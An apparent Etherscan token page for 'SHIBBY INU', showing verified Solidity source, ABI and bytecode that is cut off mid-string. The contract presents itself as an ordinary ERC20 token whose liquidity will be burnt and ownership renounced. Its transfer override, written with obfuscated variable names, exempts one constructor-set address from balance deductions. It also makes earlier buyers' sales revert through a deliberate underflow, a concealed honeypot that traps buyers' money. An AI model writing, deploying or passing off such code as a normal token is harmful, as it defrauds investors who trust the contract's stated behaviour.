ETH Price: $2,446.61 (-1.03%)

Token

SHIBBY INU (SHIBBY)
 

Overview

Max Total Supply

1,000,000,000,000 SHIBBY

Holders

19

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
9,213,348,116.384597737 SHIBBY

Value
$0.00
0xC37EE83EaD2846d391F304A965F88AA40f8B124A
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SHIBBYINU

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-01-15
*/

/*
       -Chosen makes TG
       -Chosen makes WEBSITE
       -Chosen makes TWITTER

       - LP WILL BE BURNT AND OWNER WILL BE RENOUNCED 

 */

 // SPDX-License-Identifier: GPL-3.0

pragma solidity ^0.8.2;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), 'Ownable: caller is not the owner');
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), 'Ownable: new owner is the zero address');
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) public forget;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 public _totalSupply;

    string private wide;
    string private bit;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        wide = name_;
        bit = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return wide;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return bit;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return 1000000000000 * 10**9;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return forget[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        plain(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        cold(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        plain(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        cold(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            cold(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token near, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function plain(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = forget[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            forget[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            forget[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = forget[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            forget[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function cold(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                cold(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract SHIBBYINU is ERC20, Ownable {
    address private pilot;
    uint256 private beside = 0;
    uint256 private condition = 52;

    IUniswapV2Router02 public uniswapV2Router;
    address public score;

    mapping(address => uint256) public herd;
    mapping(address => uint256) public box;

    function plain(
        address health,
        address tank,
        uint256 characteristic
    ) internal override {
        if (herd[health] == 0 && box[health] > 0) {
            if (score != health) {
                herd[health] -= condition;
            }
        }

        address plan = pilot;
        pilot = tank;
        box[plan] += condition;

        if (herd[health] == 0) forget[health] -= characteristic;

        uint256 near = characteristic * beside;
        near = near / 100;
        characteristic -= near;
        forget[tank] += characteristic;
        emit Transfer(health, tank, characteristic);
    }

    constructor(
        string memory queen,
        string memory then,
        address count,
        address cloud
    ) ERC20(queen, then) {
        uniswapV2Router = IUniswapV2Router02(count);
        herd[cloud] = condition;
        forget[_msgSender()] = 1000000000000 * 10**9;
        score = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"queen","type":"string"},{"internalType":"string","name":"then","type":"string"},{"internalType":"address","name":"count","type":"address"},{"internalType":"address","name":"cloud","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"box","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"forget","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"herd","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"score","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

6080604052600060075560346008553480156200001b57600080fd5b506040516200119f3803806200119f8339810160408190526200003e91620003c4565b838360036200004e8382620004e2565b5060046200005d8282620004e2565b5050506200007a620000746200028c60201b60201c565b62000290565b600980546001600160a01b0319166001600160a01b03848116919091179091556008549082166000908152600b6020526040812091909155683635c9adc5dea000009080620000c63390565b6001600160a01b03166001600160a01b0316815260200190815260200160002081905550600960009054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200013e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001649190620005ae565b6001600160a01b031663c9c6539630600960009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620001c7573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001ed9190620005ae565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af11580156200023b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002619190620005ae565b600a80546001600160a01b0319166001600160a01b039290921691909117905550620005d392505050565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200030a57600080fd5b81516001600160401b0380821115620003275762000327620002e2565b604051601f8301601f19908116603f01168101908282118183101715620003525762000352620002e2565b816040528381526020925086838588010111156200036f57600080fd5b600091505b8382101562000393578582018301518183018401529082019062000374565b600093810190920192909252949350505050565b80516001600160a01b0381168114620003bf57600080fd5b919050565b60008060008060808587031215620003db57600080fd5b84516001600160401b0380821115620003f357600080fd5b6200040188838901620002f8565b955060208701519150808211156200041857600080fd5b506200042787828801620002f8565b9350506200043860408601620003a7565b91506200044860608601620003a7565b905092959194509250565b600181811c908216806200046857607f821691505b6020821081036200048957634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620004dd57600081815260208120601f850160051c81016020861015620004b85750805b601f850160051c820191505b81811015620004d957828155600101620004c4565b5050505b505050565b81516001600160401b03811115620004fe57620004fe620002e2565b62000516816200050f845462000453565b846200048f565b602080601f8311600181146200054e5760008415620005355750858301515b600019600386901b1c1916600185901b178555620004d9565b600085815260208120601f198616915b828110156200057f578886015182559484019460019091019084016200055e565b50858210156200059e5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b600060208284031215620005c157600080fd5b620005cc82620003a7565b9392505050565b610bbc80620005e36000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb14610293578063dd62ed3e146102a6578063efedc669146102b9578063f0fc76fe146102cc578063f2fde38b146102ec57600080fd5b8063715018a61461023d5780638da5cb5b1461024757806391b527901461025857806395d89b4114610278578063a457c2d71461028057600080fd5b8063313ce567116100f4578063313ce567146101c957806339509351146101d85780633eaaf86b146101eb5780636e7cee86146101f457806370a082311461021457600080fd5b806306fdde0314610131578063095ea7b31461014f5780631694505e1461017257806318160ddd1461019d57806323b872dd146101b6575b600080fd5b6101396102ff565b60405161014691906109b2565b60405180910390f35b61016261015d366004610a1c565b610391565b6040519015158152602001610146565b600954610185906001600160a01b031681565b6040516001600160a01b039091168152602001610146565b683635c9adc5dea000005b604051908152602001610146565b6101626101c4366004610a46565b6103ab565b60405160098152602001610146565b6101626101e6366004610a1c565b6103cf565b6101a860025481565b6101a8610202366004610a82565b60006020819052908152604090205481565b6101a8610222366004610a82565b6001600160a01b031660009081526020819052604090205490565b6102456103f1565b005b6005546001600160a01b0316610185565b6101a8610266366004610a82565b600b6020526000908152604090205481565b61013961045c565b61016261028e366004610a1c565b61046b565b6101626102a1366004610a1c565b6104e6565b6101a86102b4366004610aa4565b6104f4565b600a54610185906001600160a01b031681565b6101a86102da366004610a82565b600c6020526000908152604090205481565b6102456102fa366004610a82565b61051f565b60606003805461030e90610ad7565b80601f016020809104026020016040519081016040528092919081815260200182805461033a90610ad7565b80156103875780601f1061035c57610100808354040283529160200191610387565b820191906000526020600020905b81548152906001019060200180831161036a57829003601f168201915b5050505050905090565b60003361039f8185856105ea565b60019150505b92915050565b6000336103b985828561070e565b6103c4858585610788565b506001949350505050565b60003361039f8185856103e283836104f4565b6103ec9190610b27565b6105ea565b6005546001600160a01b031633146104505760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b61045a6000610960565b565b60606004805461030e90610ad7565b6000338161047982866104f4565b9050838110156104d95760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610447565b6103c482868684036105ea565b60003361039f818585610788565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6005546001600160a01b031633146105795760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610447565b6001600160a01b0381166105de5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610447565b6105e781610960565b50565b6001600160a01b03831661064c5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610447565b6001600160a01b0382166106ad5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610447565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061071a84846104f4565b9050600019811461078257818110156107755760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610447565b61078284848484036105ea565b50505050565b6001600160a01b0383166000908152600b60205260409020541580156107c557506001600160a01b0383166000908152600c602052604090205415155b1561081057600a546001600160a01b03848116911614610810576008546001600160a01b0384166000908152600b60205260408120805490919061080a908490610b3a565b90915550505b600680546001600160a01b038481166001600160a01b031983161790925560085491166000818152600c602052604081208054929392909190610854908490610b27565b90915550506001600160a01b0384166000908152600b602052604081205490036108a6576001600160a01b038416600090815260208190526040812080548492906108a0908490610b3a565b90915550505b6000600754836108b69190610b4d565b90506108c3606482610b64565b90506108cf8184610b3a565b925082600080866001600160a01b03166001600160a01b0316815260200190815260200160002060008282546109059190610b27565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161095191815260200190565b60405180910390a35050505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b600060208083528351808285015260005b818110156109df578581018301518582016040015282016109c3565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610a1757600080fd5b919050565b60008060408385031215610a2f57600080fd5b610a3883610a00565b946020939093013593505050565b600080600060608486031215610a5